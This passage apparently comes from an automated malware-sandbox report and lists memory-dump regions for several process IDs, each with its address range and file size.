          Filesize

          7.7MB

        • memory/5596-97-0x00000000060B0000-0x00000000060FC000-memory.dmp

          Filesize

          304KB

        • memory/5596-181-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/5596-26-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/5596-96-0x0000000005A90000-0x0000000005AAE000-memory.dmp

          Filesize

          120KB

        • memory/5744-687-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/6268-898-0x0000000007B10000-0x0000000007B21000-memory.dmp

          Filesize

          68KB

        • memory/6268-887-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/6268-897-0x00000000077C0000-0x0000000007863000-memory.dmp

          Filesize

          652KB

        • memory/6268-899-0x0000000007B60000-0x0000000007B74000-memory.dmp

          Filesize

          80KB

        • memory/6328-773-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/6384-762-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/6424-654-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/6752-784-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/7160-805-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB